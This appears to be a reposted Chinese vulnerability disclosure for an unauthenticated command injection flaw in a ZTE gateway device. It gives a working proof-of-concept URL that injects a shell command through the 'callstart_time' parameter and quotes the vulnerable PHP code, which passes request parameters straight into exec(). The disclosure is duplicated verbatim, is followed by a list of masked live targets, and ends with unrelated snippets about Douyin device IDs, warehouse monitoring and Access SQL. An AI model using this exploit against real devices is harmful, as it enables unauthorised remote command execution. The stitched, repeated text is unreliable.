中興某閘道器裝置存在命令執行漏洞(無需登入)

2021-12-29 23:33:00 字數 3000 閱讀 1718

中興某閘道器裝置存在命令執行漏洞(無需登入)

直接給出漏洞的poc

/modules/reporting/reporting_calllogs_export.php?callstart_time=1;ifconfig>wy.txt

callstart_time、callend_time引數存在命令執行

這個檔案的部分**為:

$today = date('y-m-d', time());

$s_date = isset($_get['callstart_time']) ? trim($_get['callstart_time']) : $today;

$e_date = isset($_get['callend_time']) ? trim($_get['callend_time']) : $today;

@exec("date +'%v' -d $today", $output_today);

$weeks_today = $output_today ? intval($output_today[0]) : 0;

@exec("date +'%v' -d $s_date", $output_s);

$weeks_from = $output_s ? intval($output_s[0]) : 0;

@exec("date +'%v' -d $e_date", $output_e);

$weeks_to = $output_e ? intval($output_e[0]) : 0;

很明顯的命令執行,只要提交構造好的callend_time或callstart_time引數即可執行任意命令

再給出其他幾個案例:

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

**.**.**.**/

直接給出漏洞的poc

/modules/reporting/reporting_calllogs_export.php?callstart_time=1;ifconfig>wy.txt

callstart_time、callend_time引數存在命令執行

這個檔案的部分**為:

$today = date('y-m-d', time());

$s_date = isset($_get['callstart_time']) ? trim($_get['callstart_time']) : $today;

$e_date = isset($_get['callend_time']) ? trim($_get['callend_time']) : $today;

@exec("date +'%v' -d $today", $output_today);

$weeks_today = $output_today ? intval($output_today[0]) : 0;

@exec("date +'%v' -d $s_date", $output_s);

$weeks_from = $output_s ? intval($output_s[0]) : 0;

@exec("date +'%v' -d $e_date", $output_e);

$weeks_to = $output_e ? intval($output_e[0]) : 0;

很明顯的命令執行,只要提交構造好的callend_time或callstart_time引數即可執行任意命令

過濾

某音裝置號研究分析

分析 抓包分析 如已安裝過某音,需重置模擬器才可抓到包,剛開啟抖音即可抓到註冊裝置號的資料報 資料報截圖 選項 解釋 請求方式 post 請求體 加密資料報 返回資料 裝置號資訊 主要引數 device id和install id 可分析出除了xg演算法,主要引數加密body體了 部分 python...

閘道器裝置是否合法 工業閘道器下的倉庫安全監測管理系統

倉庫很多時候往往存放很多生產原料 成品 包裝等一系列易燃易爆物品,導致危險係數很高,一旦發生失火 等事件帶來巨大損失,甚至傷及人命,所以加強倉庫及其物資的安全管理十分有必要,主要考慮防火 受潮兩個因素。因此,工業閘道器下倉庫安全監測管理系統顯得十分重要。工業閘道器下倉庫安全監測管理系統具備火情監測 ...

用SQL語句查詢Access中某錶是否存在方法

access資料庫雖然功能單一,但的確是乙個小巧精幹的開發夥伴,我在多個專案中與它見面,為了探知access資料庫的本源,今天上網查了些資料。現總結歸納如下 在access資料庫中通過sql語句找到某一表是否存在的確是一件困難的事。幸好,access本身就有一些隱含的資料物件能夠儲存你庫中的資訊,今...